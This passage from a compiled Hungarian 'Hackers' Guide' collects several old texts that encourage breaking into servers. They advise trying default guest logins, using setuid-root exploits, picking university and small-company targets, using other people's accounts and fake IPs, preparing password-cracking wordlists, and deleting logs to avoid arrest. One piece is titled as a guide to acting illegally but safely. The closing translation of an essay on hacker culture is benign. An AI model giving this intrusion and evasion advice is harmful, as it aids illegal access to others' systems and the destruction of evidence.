• Angol nyelv. Hát igen... magyar nyelven nem kaphatunk túl sok segítséget, az<br />
interneten pedig szinte minden angolul van.<br />
Az itt felsoroltak második csoportja nélkül is elindulhatunk, de túl sokáig nem fogunk<br />
eljutni. A hackelésnek/crackelésnek ugyanis éppen az a lényege, hogy ezeket<br />
megismerjuk, és megtaláljuk gyengéit, majd megtanuljuk azokat érdekeinknek<br />
megfelelôen kihasználni. Elôször különbözô ágazatok felületes megismerését<br />
ajánlom, majd amely szimpatikus, abban az irányban továbblépni. Ebben segítséget<br />
nyújt majd az internet, és a magyar nyelven is kapható szakkönyvek.<br />
A különbözô rendszerek, programozási nyelvek és hálózatok tanulása -és NEM<br />
megtanulása- egyenként is egy, esetleg fél év, még akkor is ha minden héten<br />
szánunk rá néhány órát. Ekkor érjük el kb. azt a szintet amellyel már elkezdhetünk<br />
direkt hackeléssel/crackeléssel foglalkozó szövegeket olvasni.<br />
Valószínüleg most sokan abbahagyják az olvasást és kiábrándultan<br />
továbbszörföznek a WEBen. Igen... igazuk lehet?!<br />
47
Hackers’ Guide<br />
Most röviden leírok egy egyszerûbb módszert, (leegyszerüsítve) a sok közül<br />
Nem túl bonyolult: valahonnan szerezzünk vagy töltsünk le egy telnetezésre<br />
alkalmas programot. Ezt esetleg megtehetjük egyes program gyûjteményekbôl a<br />
weben, de a legjobb ha pl. irc-n kérünk valakitôl. /ilyen gyûjteményt találhattok a<br />
linkjeim között is/ Ha már fel tudunk kapcsolódni az internetre és minden be van<br />
állítva, akkor elindíthatjuk a szerzett programot. Keressünk, kérjünk vagy szerezzünk<br />
valahonnan egy szerver címet, majd kapcsolódjunk hozzá. /pl: 1.123.187.65, ez az<br />
IP cím, valami ilyesmit keressünk/ Sajnos minden telnet program másként néz ki,<br />
ezért a mûködését és kezelését már nem tudom elmagyarázni.<br />
Az egész procedúra lényege, hogy hozzákapcsolódunk egy speciális hálózati<br />
operációs rendszerû szerverhez (=> ilyen gépekrôl jön többek között a weboldalak<br />
tartalma, a letölthetô filek és egyáltalán minden adat, információ amelyet távolról<br />
kapunk meg), amelynek tulajdonképpen megkapjuk egy ablakba a kezelô felületét,<br />
vagyis bizonyos értelemben azt a képet amit akkor látnánk, ha ott ülnénk helyben a<br />
gép elôtt. Ezt talán ahhoz tudnám hasonlítani, amikor Windows95 alatt megnyitunk<br />
egy MS-DOS ablakot és oda írjuk be a parancsokat.<br />
Természetesen ezeken a gépeken olyan rendszer van mint például a UNIX, amely<br />
biztosítja, hogy ismeretlenek semmit se tudjanak kezdeni géppel, és az átlag<br />
felhasználók se tudjanak kárt tenni magában a rendszerben, legfeljebb csak saját<br />
dokumentumaikban és programjaikban. Ez egész egyszerûen úgy van megoldva,<br />
hogy az átlag felhasználó nem is látja a rendszer belsô felépítését és<br />
programszerkezetét, csak a számára engedélyezett részeket<br />
olvashatja/írhatja/futtathatja.<br />
Egy hacker dolga egy ilyen rendszert feltörni, tehát megszerezni magának<br />
valamilyen módon a jogosultságot az egész rendszer irányítására....<br />
Itt kezdôdik az a pont ahol már csak az irdatlan hosszúságú,és nem igazán könnyen<br />
érthetô angol hacker fileok olvasásával megyünk valamire. Bennük tanácsot és<br />
ötletet kaphatunk. Természetesen ez azért nem ennyire egyszerû... konkrét<br />
eseteknél csak a frissebb anyagokkal megyünk valamire, mert a régiek olyan<br />
hiányosságokat és kiskpukat használtak ki a programokban, amelyeket azóta<br />
valószínüleg már rég kiküszöböltek.Fontos, hogy inkább elôször olvassunk inkább és<br />
tudjunk meg mindent amit lehet. Állami gépeket nagy ívben kerüljük el, viszonylag<br />
veszélytelenebb célpontok elsô nekifutásra az egyetemi és kollégiumi szervrek.<br />
Elôször eddig tartott a szöveg, de gondoltam ezt talán már sokan azelôtt is tudták,<br />
mielôtt idejöttek, ezért még a történet egyik lehetséges befejezését is leírom.<br />
Szükségünk van még egy névre és egy jelszóra, amivel legalább átlag<br />
felhasználókent bejuthatunk a szerverre. Sok helyen például ilyesmi:<br />
név: guest, user...<br />
jelszó (esetleg semmi): guest, user, demo...<br />
de jobb ha valakit megkérünk, hogy mondjon ilyet nekünk, vagy crackelünk egyet...<br />
bár ez még hátrébb van.<br />
48
Hackers’ Guide<br />
Léteznek, és sok helyen letölthetôek úgynevezett EXPLOIT programok, amelyek<br />
különösen nagy segítséget jelentenek néha. Mûködésük megértéséhez egy kis Unix<br />
ismeret is szükséges.<br />
A Unixban minden filenál megvan határozva, hogy a felhasználok mely csoportjának<br />
van olyan jogosultsága, hogy azt a filet olvashatja, írhatja és módosíthatja. Konkrétan<br />
ez úgy néz ki, hogy /mindenki tartozik a file szemponjából valamilyen csoporthoz/ a<br />
file létrejöttekor be kell állítani, hogy a file tulajdonosának, a vele egy csoportban<br />
lévôknek és az összes többieknek mire adunk engedélyt a fileal kapcsolatban. Van<br />
egy olyan speciális funkció, hogy amíg a filét mondjuk egy bármilyen személy futtatja<br />
/természetesen ha van erre jogosultsága/ akkor olyan jogosultságokat kap a<br />
rendszeren belül, mint a file tulajdonosa.<br />
Erre gyakran szükség van, amennyiben ez komolabban érdekel valakit, az máris<br />
mehet a könyvesboltba egy Unix könyvért.<br />
Visszatérve a tárgyhoz, ez akkor lehet hasznos egy hackernek, ha a file történetesen<br />
egy a rendszergazda (=root) tulajdonában álló file. Mint tudjuk a rendszergazdának<br />
korlátlan joga van az egész rendszer módosítására, tehát ha a filet futtatás közben<br />
sikerül megállítanunk, akkor az azt jelenti, hogy mi megkapjuk a root jogait és így a<br />
teljhatalmat is a rendszer fölött. Az Exploitok abban segítenek, hogy egy hibásan<br />
megírt programot megállítanak, és így megkímélnek minket minden komoly<br />
munkától.<br />
Ha egy renszeresen használt programban hibát talál valaki, és ez a valaki monjuk<br />
éppen egy cracker, akkor gyakran megírja hozzá az Exploitot és az pillanatok alatt<br />
elterjed az egész világon. Persze erre válaszul a program készítôi gyorsan kijavítják<br />
a hibát, és a magukra valamit is adó rendszergazdák például megszerzik a hiba<br />
kijavítását elvégzô programot. Ha sikerült mindez, akkor következik a<br />
mesterkedésünk nyomainak eltakarítása, ami megint csak egy külön tudomány...<br />
Hát... ennyire futotta így most hirtelen... Remélem most ez is segített!<br />
Eredeti: CoDemon<br />
- H3XR00T -<br />
http://hexnet.hpage.<br />
net/<br />
************************************************************************************************<br />
Kik a hackerek<br />
49
Hackers’ Guide<br />
FIGYELEM! A HACKERKEDEST VILAGSZERTE BUNTETIK!!! AMENNYIBEN TE<br />
TAVOL KIVANOD TARTANI MAGAD AZ ILYEN JELLEGU DOLGOKTOL, KERLEK<br />
NYOMD MEG AZ ESC-ET, TOROLD LE EZT ES AZ EHHEZ HASONLO<br />
DOLGOKAT A GEPEDROL, ES FELEJTSD EL, HOGY EZEKET HOL LEHET<br />
MEGTALALNI! AMENNYIBEN UGY DONTESZ, HOGY TOVABBOLVASOD, EL<br />
KELL FOGADNOD,HOGY A FELELOSSEG KIZAROLAG A TIED!<br />
TARTALOM<br />
Bevezeto<br />
Kik a Hackerek?<br />
Milyen egy igazi Hacker?<br />
Hackerek alaptorvenyei<br />
Hogyan is vagjunk neki?<br />
Vegszo<br />
Par szot a csapatrol<br />
Bevezeto<br />
Hali mindenkinek! Ennek a filenak az a celja, hogy kezdo hackerpalantaknak<br />
segitseget nyujtsunk, segitsuk oket elinditani ezen a nehez uton. Bizonyara felmerul<br />
a kerdes, hogy miert eppen magyarul irom, miert nem angolul, es ha mar magyarul<br />
irom, akkor miert nem ekezetekkel. A valasz egyszeru. Mivel mi magyarok vagyunk,<br />
ezert magyarul jobban tudunk, es a kezdo magyar nyelvu hackerek pedig jobban<br />
megertik, mint a hasonlo temaban irodott angolnyelvu szovegeket. Az ekezet pedig<br />
egy olyan dolog, hogy ha en most ekezettel irnam, akkor a kulonfele gepeken<br />
kulonbozo kepp jelenne meg, es eleg zavaro tud lenni az ekezetek helyett a sok<br />
kriksz-kraksz.<br />
Kik a hackerek?<br />
A szo egyik jelentese: csakany. Az elso hackerek a szamitogep elterjedese utan<br />
szulettek meg, igaz akkor meg mast jelentett hackernek lenni. A kezdeti idokben a<br />
szamitogepek qrva nagyok voltak, kicsi memoriaval, es nuku wincsi. Ekkor a<br />
programozoknak meg erdekuk volt, hogy minel kisebbre irjak meg a programokat,<br />
mert a lemez es a memoria merete veges volt. Az eszes diakok arra torekedtek,<br />
hogy a kesz programokat minel jobban lefaragjak, minel kisebb legyen a program, es<br />
ugyanazt tudja. Ehhez nem kis programozasi tudas kellett. Tehat ok az osok.<br />
Buszkek lehetunk rajuk! Ma mar persze a halozatok birodalmaban van a Hackerek<br />
hazaja.<br />
Roviden: A hacker az, aki a halozatokba betor, helyben, vagy interneten keresztul. A<br />
hackereket persze tobb csoportba lehet osztani, tevekenyseguktol fuggoen. Vannak<br />
akik sajat maguk irnak progikat a feltoreshez, vannak akik a masok altal megirt,<br />
kozzetett programokkal dolgoznak, de a tobbseg vegyes osszetetelu, irnak is, maset<br />
is hasznaljak. A fontosabb kulonbseg a hackerek kozott az, hogy miert csinaljak az<br />
egeszet.<br />
50
- ElitHacker<br />
- Hacker<br />
Ok azok, akik azert tornek be valahova, mert elvezik.<br />
Megis mi az, ami miatt csinaljak?<br />
Hackers’ Guide<br />
Az erzes miatt. Amiatt, hogy XY helyre sikerult betorni. Mert ahhoz, hogy az ember<br />
valahova betorjon, programokra, technikara, logikara, ugyessegre van szukseg. Nem<br />
kis nehezseg megcsinalni ugy, hogy nehogy elcsipjek oket. Kockazatos jatek, ahol<br />
neha a gyors dontesen mulik minden. Ki kell jatszani a rendszer vedelmet (akarcsak<br />
a fociban a csatarnak a vedelmet). Ez korulbelul olyan erzes, mint egy nagyon<br />
biztonsagos bortonbol<br />
megszokni. Bennuk van a virtus. "Azert is megcsinaljuk!"<br />
-Jerk, vagy mas neven a Hackerek vandalja.<br />
Ok olyanok mint az igazi vandalok, csak rombolnak ertelem nelkul, ebben lelik<br />
oromuket. (Ez a tipus kihalofelben van, ha mar ki nem halt...)<br />
A hackerek kozott vannak olyanok, akik bankokba tornek be, penzt lopnak, az<br />
eszukkel. Ez nem tul jellemzo a hackerek tarsadalmaban.<br />
A tobbseg ha valahova betort, akkor:<br />
- Esetleg biztositja, hogy maskor is be tudjon jonni.<br />
- Esetleg ha jo progik vannak a serveren, elmenti maganak.<br />
- Esetleg ha jo progik vannak a serveren, akkor masok szamara is hozzaferhetove<br />
teszi, vagy a lementett progikat valahol kozzeteszi a neten.<br />
- Esetleg a serveren hagy vmilyen szovegfilet, amiben leirja, hol van res a<br />
rendszerben, hol tudott bejonni. (Oket szeretik a rendszergazdak!)<br />
- Penzert karbantartja a servert, igy o is es a rendszergazda is jol jar.<br />
- Stb.<br />
Milyen egy igazi hacker?<br />
1. Intelligens<br />
2. Mindent akar tudni, mindenre kivancsi<br />
3. Nem tul rossz tanulo a suliban, mivel a hackeleshez kell a logika es esz<br />
4. Nem rombol szandekosan egy rendszerben, ahova betort<br />
5. Az igazi hacker mindig kepzi magat, hogy jobb legyen<br />
6. Igyekszik a legujabb technologiat elsajatitani<br />
7. Nyugodtak, megbizhatok<br />
8. Paranoias<br />
9. Tud angolul, esetleg nemetul is<br />
10. Programozik ASM-ben vagy C-ben, es meg egy masik programnyelvben is<br />
Hackerek alaptorvenyei<br />
51
Hackers’ Guide<br />
1. Ne semmisitsd meg a feltort operacios rendszert, ne tegyel benne kart, ha nem<br />
muszaj!<br />
2. Ne feledkezz meg letorolni azokat a filekat, amik veszelyeztetik a menekulesedet,<br />
amik alapjan azonosithatnak, vagy amikbol esetleg rajohetnek, hogy hogyan jutottal<br />
be a rendszerbe!<br />
3. Sehol ne hagyd meg a valodi neved, telefonszamod, vagy olyat, ami alapjan<br />
konnyen elkaphatnak!<br />
4. Vigyazz, kinek mit mondasz magadrol! Ilyen temarol lehetoleg NE telefonon vagy<br />
zsufolt helyen beszelgessetek! Ne adj lehetoseget annak, hogy zsarolni tudjanak!<br />
5. Akit meg nem ismersz igazan, annak ne add meg a valodi telefonszamodat!<br />
6. Allami es gazdasagi szerverekre ne torj be, csak ha nagyon profi vagy, ugyanis<br />
ezek vannak a legjobb vedelemmel ellatva! Kezdj inkabb eloszor kisebb cegekkel!<br />
7. Legy paranoias! Mivel a te tevekenyseged torvenyserto, ezert mindig resen kell<br />
lenned! Kodold azokat a filejaidat, amik esetleg bizonyitekul szolgalhatnak ellened!<br />
Az ilyen temaju jegyzeteidet, cimeidet tartsd hozzaferhetetlen, nehezen elerheto<br />
helyen!<br />
8. Levelben ne irj a tevekenysegedrol, Emailben lehetoleg csak PGP-vel irj ilyen<br />
temarol, IRC-n pedig egyedul a DCC CHAT-ben bizhatsz meg, jelen pillanatban<br />
egyedul az nem kovetheto nyomon, hogy ott mirol beszelgettek.<br />
9. Nem szegyen masoktol tanulni! Sot! A jovod mulhat egy-egy jo tanacstol, altalad<br />
ismeretlen technikatol, fortelytol! EZERT: NYUGODTAN KERDEZZ, ES TANULJ<br />
MAS HACKEREKTOL! De ez viszont is igaz, ha toled kernek segitseget, te is segits<br />
masoknak!<br />
10. Igyekezz minnel tobbet tanulni, minel tobb filet elolvasni azokbol, amit a<br />
vilagszerte elo hackerek irtak, mert mindig lehet ujat tanulni! Addig ne kezdj bele,<br />
amig nagyobb ismeretet el nem sajatitasz ezen a teren, mert kulonben konnyen racs<br />
moge kerulhetsz, vagy fizetheted a birsagot, ezzel egyidejuleg pedig konnyen<br />
kirakhatnak a sulibol, munkahelyedrol!<br />
11. Ne becsuld ala a rendszer es a rendszergazda kepesseget, legy ovatos!<br />
12. Olyan helyre, ahol tudod hogy varnak rad, vagy a hackerek tamadasara, NE<br />
PROBALJ MEG BETORNI!!!!!! Ezzel mar tobben megjartak vilagszerte.<br />
13. Ha betortel valahova, es mindenkepp hagyni akarsz valami azonositot a<br />
csapatodrol, vagy magadrol, akkor lehetoleg gondold vegig, hogy ha egyszer<br />
valamikor elkapnak, akkor azok alapjan mar gyerekjatek lesz megmondani, hogy<br />
hova tortel be te! Meg le se tagadhatod, mivel ott hagyod a csapatod, vagy sajat<br />
kezjegyedet.<br />
52
Hackers’ Guide<br />
14. VEGUL: LEGY MAGABIZTOS, ES NE VESZITSD EL A FEJED BAJ ESETEN!<br />
Egy dolog betorni valahova. Sokkal nehezebb kijonni ugy, hogy nehogy elkapjanak<br />
utana es lehetoleg meg a server winchestereben se kelljen wipeolgatni. Mert az igazi<br />
hacker tudomanya ebben all!<br />
Hogy is vagjunk neki?<br />
Eloszoris szerezz be:<br />
- Oktato filekat a kulonbozo oprendszerek feltoreserol.<br />
- Programokat a kulonbozo oprendszerek feltoresehez.<br />
- Port Scannert<br />
- FTP Klienst<br />
- Telnet Klienst<br />
- Fake IP-t, Fake Hostot biztosito progit (lehetoleg)<br />
- Valakinek az Accountjat, amivel kitudsz egy szolgaltaton keresztul jutni a netre.<br />
(SAJAT ACCOUNTTAL HACKERKEDNI ONGYILKOSSAG!!!)<br />
- Szabad idot a hackerkedeshez<br />
- Legalabb 1, hamis adatokkal letrehozott Emailcimet egy ingyenes Emailcimet<br />
biztosito serveren.<br />
- Esetleg egy progit, amivel fake emailokat tudsz irni szukseg eseten. (Persze azt ne<br />
felejtsd el tesztelni eloszor!)<br />
- Egy vagy tobb filet, amiben abc, vagy cba sorrendben vannak szavak szotarbol<br />
kiirva (angol nyelvu mindenkepp kell, +1 olyan nyelvu, amilyen nyelvu orszag<br />
szerverere szeretnel betorni)! Ez a kodporgeto progikhoz kell.<br />
- Szotart kezkozelben, ha valamiert szukseged lenne ra!<br />
Vegszo<br />
Azt hiszem ennyi! Ezek utan mar nincs mas hatra, minthogy mindenkinek sok sikert<br />
kivanjak, es jo szerencset! Angolul pedig aki teheti tanuljon, mert az ilyen temaban irt<br />
szovegek 99%-a angol nyelven irodott, ertheto okokbol. Ezek utan pedig szerezzetek<br />
be a kellekeket, es kepezzetek magatokat, ha meg ezek utan is ugy gondoljatok,<br />
hogy hackerek akartok lenni!<br />
Szerző: Fireball<br />
And SpEcIaL ThNx 2:<br />
Zsu, wHo WaS The CoRReCtOR, and She GaVe ME CooL IdEaZ!<br />
************************************************************************************************<br />
53
Hackers’ Guide<br />
Mi is a cracker? Hogyan tevékenykedj illegálisan de biztonságban<br />
Ebben a rövid leírásban elmagyarázom neked a különbséget a hacker és a cracker<br />
között. Elmondom, hogy, hogyan válhatsz crackerré, és hogy, hogyan tudsz<br />
biztonságosan dolgozni a neten. Azonban ne feledd: Soha nem tudhatod, hogy ki,<br />
mikor és honnan figyel téged!<br />
A neten és az egyéb helyeken már rengeteg "leírás" és okfejtés született,<br />
hacker/cracker ügyben. Sajnos gyakran (szinte mindíg) keverik a fogalmakat pedig<br />
nagyon messzi állnak egymástól. A sajtó miatt mostmár a hacker egyet jelent a<br />
"csúnya rossz bácsikkal akik betörnek a számítógépes rendszerekbe és ellopják sok<br />
sok ember hitelkártyaszámát, megcsapolják bankszámláját. Ezt a tévhitet<br />
szétoszlatván nézzük meg, hogy mi is a különbség hacker és cracker között.<br />
A hackerek olyan emberek (gyakran programozók is) akik betéve tudják az operációs<br />
rendszerek és más egyéb programok működését és felépítését. Legtöbbször ők<br />
fedezik fel a biztonsági réseket is a programokban/rendszerekben. A hackerek<br />
állandóan képzik magukat, és a megszerzett információkat, új felfedezéseket is<br />
ingyen közzé teszik. És talán ami megkülönbözteni a crackerektől a hackereket az,<br />
hogy SOHA nem tesznek kárt a rendszerekben ahova bejutnak.<br />
A cracker olyan emberke aki kizárólag rombolás céljából tör be a rendszerekbe.<br />
Semmi más nem érdekli, csak a rombolás. A crackernek van egy másik "<br />
programozó alfaja" is aki programokat tör fel. Tehát a crackereket könnyű<br />
megkülönböztetni, mert általában a tevékenységük a rossz szándékon alapszik.<br />
[Megjegyezném, hogy gyakran a hackerek sem tudják egyértelműen besorolni<br />
magukat. Mert ugye ha a hacker nem rombol; akkor amikor a nyomokat eltünteti<br />
maga után akkor kell a log-fileokat buherálni sokszor komplett delete az egész log<br />
file... Szóval erre szoktam azt mondani, hogy a zseni és az őrült között is nagyon<br />
vékony a határ! - H3XR00T]<br />
Na... remélem kicsit azért megvilágosodott a hacker és a cracker közti különbség.<br />
Most pedig kicsit bővebben a crackerekről.<br />
Az első dolog amit nagyon ajánlanék az, hogy olvass sokat! A legjobb útja a<br />
tanulásnak. Persze angol nyelvismeret nélkül nem fog meni, de vannak olyan rendes<br />
emberek [Jaja! =) - H3XR00T] akik, ha idejük engedi lefordítgatják az angol<br />
szövegeket ikes magyar nyelvre... a másik fontos dolog a gyakrolás. Mert két dolog<br />
az elmélet, és a gyakrolat. Szövegeket rengeteget lehet találni a neten csak jó helyen<br />
kell őket keresni; általában minden hacker oldalon van valami kis ismertetőanyag.<br />
Mindent olvass el és nézd át az ismertebb oprendszerek leírását/műközdését!<br />
(Win9x,2000, Linux)<br />
Másodszor, ismerned kell a netet! Hogyan épül fel, minek mi a feladata, mit használ,<br />
mindent! Értsd a netet és segíteni fog a munkádban!<br />
Keress barátokat, és ne ellenségeket! Rengeteg ember van aki szívesen segít neked<br />
ha értelmes kérdéseket teszel fel nekik. De hangsúlyozottan értelmes kérdésekről<br />
van szó, és nem "taníts meg hackelni" típusú lamer kérdésekről. [Az ilyenekre, én<br />
nem is válaszolok... - H3XR00T] És csak akkor kérdezz ha már szerinted mindent<br />
54
Hackers’ Guide<br />
végigpróbáltál. Ha a birtokodba jut valami info akkor azt ne tartsd meg magadnak,<br />
oszd meg másokkal is! Mert ha te sem osztod meg akkor más se és akkor nem fog<br />
születni egyetlen egy ilyen doksi sem!<br />
Nézz meg sok hacker oldalt! Ezeken rengeteg naprakész információt találhatsz.<br />
[Példaképp megemlíteném, a magyarországi BO lázt. Nem dicsekvésképpen<br />
mondom, de talán Mo.-n az első körben próbálgattam ki ezt a trójai programot!<br />
Akkoriban a matávos előfizetőknek a fele már BO-val fertőzött volt! - H3XR00T]<br />
Ismerd meg a hackereket/crackereket! Kik ők, mit és miért csinálnak! Nézd meg a<br />
híresebb hackercsoportok weblapjait, kérdezz tőlük de ne hulye kérdéseket! Ismerd<br />
meg a trójai programokat, vírusokat, és kezdj ismertetőket írni és írd le mit tudsz! Ha<br />
találsz barátokat alapítsatok csapatot! NE lamer csapatot, igazi tevékeny csapatot!<br />
Mert ugye az nem sokat ér, ha vannak a csapatban 20-an és abból 2-3 dolgozik a<br />
többi még a levelezőlistára sem írogat...<br />
Mint már említettem szerezz barátokat! Soha ne mondj hülyeségeket! Nem tudhatod,<br />
hogy kivel beszélsz valójában! Lehet, hogy egy lamer, de lehet, hogy egy nálad<br />
nagyságrendekkel többet tudó cracker, és akkor véged! Nefeledd, hogy mindíg van<br />
olyan aki nálad többet tud!<br />
Lehetőleg ne törj fel oldalakat szórakozásból, és soha ne törj be oda ahol tudod,<br />
hogy várhatnak! Lehetőleg az állami intézményeket is kerüld. Mielőtt elkezdenél<br />
crackelni, tanuld meg a főbb dolgokat! Mi is az IP, hogyan épül fel, mi az<br />
ftp/telnet/www/e-mail/portok..stb. Ismerd meg hogyan működnek, és így lehetőséged<br />
nyílik a hibák feltárására, és akkor sikeresen betörhetsz!<br />
Még egy fontos dolog: tanuld meg C++ és/vagy Visual Basic -ben programozni. Ez a<br />
kettő mindenképpen nyelv kelleni fog a jövőben! Bár sok programot (Pl: exploit) lehet<br />
találni a neten, de ha nem találsz magadnak kell írnod egyet!<br />
Zárásként mindenféle egyéb dolgok... Rengeteg ember van akik heccből törnek fel<br />
számítógépeket. Ezek a lamerek. Hülye emberek akik megpróbálnak téged is<br />
elpusztítani. Ezér mindíg légy nagyon óvatos, és körültekintő! Soha ne fogadj el<br />
idegentől fileokat. Aki küldte lehet, hogy valójában vírust, vagy trójai programot<br />
küldött neked és amint elindítod véged van! Soha ne beszélj a terveidről a neten, mit<br />
fogsz feltörni, mikor... stb. Főleg ne nyílvános fórumokon. És soha ne felejtsd! Nem<br />
tudhatod ki figyel téged!<br />
Eredeti: tH3 m4n!4c dancho@mbox.digsys.bg<br />
- H3XR00T -<br />
http://hexnet.hpage.<br />
net/<br />
************************************************************************************************<br />
Hogyan lesz az emberből Hacker<br />
55
Hackers’ Guide<br />
Miért ez az iromány?<br />
Mint a Zsargon Fájl szerkesztője, gyakran kapok e-maileket lelkes hálózaton kezdő<br />
újoncoktól, amikben (tulajdonképpen) az kérdezik, hogy "hogyan lehet belőlem is<br />
nagy hacker varázsló?". Különös, de úgy tűnik, hogy nincsen egy GyIK vagy Web<br />
oldal sem, ami ezzel a fontos kérdéssel foglakozna, úgyhogy itt van az enyém.<br />
Ha offline olvasod ezt a doksit, megtalálod a legfrissebb (angol nyelvű) változatot a<br />
http://www.tuxedo.org/~esr/faqs/hacker-howto.html weblapon.<br />
Mi az, hogy Hacker?<br />
A Zsargon fájlban találsz egy csomó definíciót a `hacker' kifejezésre, a legtöbbjükben<br />
szerepel a jó műszaki érzék, a problémamegoldás és a korlátok ledöntésének<br />
élvezete. Ha viszont konkrétan az érdekel, hogy hogyan lehetsz Te is hacker, akkor<br />
csak két dolog a fontos. Van egy kultúra, a kiváló programozók és hálózati varázslók<br />
közös kultúrája, ami évtizedekre nyúlik vissza, az első időosztásos miniszámítógépek<br />
és a legelső ARPAnet kísérletek idejébe. Ezek az emberek honosították meg a<br />
`hacker' kifejezést. Hackerek építették az Internetet. Hackerek tették a Unix<br />
operációs rendszert azzá, ami. Hackerek üzemeltetik a Usenet hírfórumokat.<br />
Hackerek tartják működésben a Világhálót. Ha ennek a kultúrának a része vagy, ha<br />
hozzájárultál valamivel és mások a közösségből ismernek és hackernek titulálnak,<br />
akkor hacker vagy.<br />
A hacker beállítottság nem korlátozódik a szoftver-hacker kultúrára. Vannak olyanok,<br />
akik a hacker mentalitást más területen gyakorolják, ez lehet pl. elektronika vagy<br />
zene -- valójában ezzel a viselkedési formával találkozhatsz a tudományok vagy a<br />
művészet legmagasabb szintjein. A szofver-hackerek elismerik ezeket a<br />
rokonlelkeket, néha nyíltan "hackereknek" is hívják őket -- egyesek azt vallják, hogy a<br />
hacker természet valójában független attól, hogy mit is hackel az illető. Ennek<br />
ellenére, e dokumentum hátralévő részében a szoftver-hackerek képességeivel és<br />
viselkedésükkel, valamint a `hacker' kifejezést létrehozó közös kultúra tradíciójával<br />
foglalkozom.<br />
Van egy másik csoport is, amely az hangoztatja magáról, hogy hackerekből áll, de ez<br />
nem fedi a valóságot. Ezek az emberek (főleg serdülő fiúk) azok, akik poénosnak<br />
tartják, hogy betörnek számítógépekre, vagy szórakoznak a telefonhálózattal. Az<br />
igazi hackerek ezeket az embereket `crackereknek' hívják és hangoztatják, hogy<br />
semmi közös nincs bennük. Az igazi hackerek szerint a crackerek lusták, felelőtlenek<br />
és nem briliáns elmék, azzal érvelnek hogy a biztonsági intézkedések megsértése<br />
nem tesz hackerré, ugyanúgy, ahogy attól sem leszel közlekedésmérnök, ha el tudsz<br />
kötni egy autót. Sajnos sok író és újságíró keveri a két kifejezést, a crackereket is a<br />
`hacker' kifejezéssel írja le; ez kimondhatatlanul idegesíti az igazi hackert.<br />
Az alapvető különbség: a hackerek építenek, míg a crackerek rombolnak.<br />
Ha hacker akarsz lenni, olvass tovább. Ha cracker akarsz lenni, olvasd el az alt.2600<br />
hírcsoportot, és készülj fel öttől tíz évig terjedő börtönbüntetésre, miután kiderült,<br />
hogy nem vagy olyan okos, mint hitted. Ennyit a crackerekről.<br />
A hacker hozzáállása<br />
A hacker problémákat old meg és dolgokat hoz létre, hisz a szabadságban és a<br />
kölcsönös önkéntes segítségnyújtásban. Ahhoz, hogy befogadjanak a hackerek,<br />
56
Hackers’ Guide<br />
Neked is hasonló hozzáállást kell tanúsítanod. Ahhoz, hogy ennek az elvárásnak<br />
megfelelően tudjál viselkedni, tényleg hinned kell ebben a hozzáállásban.<br />
Ha úgy gondolod, hogy csak azért viselkedsz úgy, mint a hackerek, hogy<br />
befogadjanak, akkor elsiklasz a lényeg felett. Az, hogy higgyél ennek a<br />
viselkedésnek a helyességében, nagyon fontos Neked -- ez segít a tanulásban, és<br />
ez motivál. Mint minden kreatív művészetnél, nem elég a mestert csak ésszel<br />
imitálni, szívvel is kell.<br />
Tehát, ha hacker akarsz lenni, ismételgesd a következő dolgokat, amíg el nem<br />
hiszed őket:<br />
1. A világ tele van lebilincselő, megoldásra váró problémákkal<br />
Hackernek lenni szórakoztató dolog, de ez az a fajta szórakozás, ami erőfeszítést<br />
igényel. Az erőfeszítés nagy része a motiváció. A sikeres atlétákat az fizikailag<br />
mámorító érzés motiválja, hogy testüket tökéletesítik, és a lehető legjobbat kihozva<br />
magukból túlszárnyalják a saját fizikai korlátjaikat. Ehhez hasonlóan, akkor lehetsz jó<br />
hacker, ha izgalomba hoznak a megoldásra váró problémák, cél és motiváló erő a<br />
képességeid fejlesztése és az elméd edzése.<br />
Ha természetednél fogva nem így érzel, meg kell változnod ahhoz, hogy sikeres<br />
hacker legyél. Máskülönben gyorsan azon kapod magad, hogy a hackelésre szánt<br />
energiád elfolyik más irányba, mint pl. szex, pénz vagy társadalmi elismerés<br />
megszerzésének irányába.<br />
(Ezek mellett meg kell tanulnod hinni a tanulási képességedben -- hinni abban, hogy<br />
ha nem is tudsz mindent, ami a probléma megoldásához kell, ha elkezded a<br />
probléma egy részét boncolgatni, megtanulsz közben annyit, amennyi a következő<br />
részfeladat megoldásához szükséges -- és így tovább, amíg az egész problémát<br />
meg nem oldod.)<br />
2. Soha senkinek nem kell ugyanazt a problémát kétszer megoldani<br />
A kreatív elmék értékes és korlátozott erőforrást képeznek. Nem szabad őket a kerék<br />
újrafeltalálására pazarolni, amikor annyi új érdekes probléma vár megoldásra.<br />
A hacker magatartására jellemző, hogy tudatában van annak, hogy a többi hacker<br />
ideje értékes -- ezért az információ megosztását majdnem erkölcsi kötelességének<br />
érzi. Az így megosztott megoldások segítségével más hackerek új problémákkal<br />
tudnak foglakozni.<br />
(Nehogy azt hidd, hogy minden kreativitásodból származó szellemi termékedet be<br />
kell dobnod a közösbe, bár minél többet adsz, annál jobban fog a többi hacker<br />
tisztelni. A hacker értékekkel összefér, ha eladsz annyit magadból, hogy kifizesd a<br />
lakbért, tudjál kaját és számítógépeket venni. Belefér, ha hackelésből eltartod a<br />
családodat, sőt az is, ha meggazdagszol, mindaddig, amíg nem felejted el, hogy<br />
hacker vagy.)<br />
3. Az unalom és a robotolás rossz<br />
Hackert (és a kreatív embereket általában) nem szabad unalomra ítélni vagy ostoba,<br />
robotolás jellegű munkára fogni, ha ez mégis megtörténik az azt jelenti, hogy nem azt<br />
csinálja, amihez csak ő ért -- megoldást keresni új problémákra. Ez a pazarlás<br />
mindenkinek rossz. Ezért az unalom és a robotolás nem csak kellemetlen, de rossz<br />
is mindenkinek.<br />
57
Hackers’ Guide<br />
Ha hackerként akarsz viselkedni, akkor annyira kell ebben higgyél, hogy<br />
automatizáld az unalmas dolgokat, amennyire csak lehet, nem csak magad miatt, de<br />
mindenki más miatt is (főleg a többi hackerért).<br />
(Erre a szabályra egy látszólagos kivétel van. A hackerek csinálnak néha dolgokat,<br />
amelyek unalmasnak és robotjellegűnek tűnhetnek a kívülálló számára, de valójában<br />
ezekre azért van szükség, hogy egy képességet fejlesszenek, vagy gyakorlatot<br />
szerezzenek valamiben, amit másképp nem ismerhetnének meg. Ez azonban a<br />
hacker saját választása -- egy gondolkodó embert sem szabad unalomba<br />
kényszeríteni.)<br />
4. A szabadság jó dolog<br />
A hacker természeténél fogva hatalomellenes. Bárki, aki parancsokat osztogat neki,<br />
akadályozza az éppen soron lévő érdekes probléma megoldásában -- és mivel<br />
tudjuk, hogyan működik a parancsokat osztogatók agya, ez előbb utóbb<br />
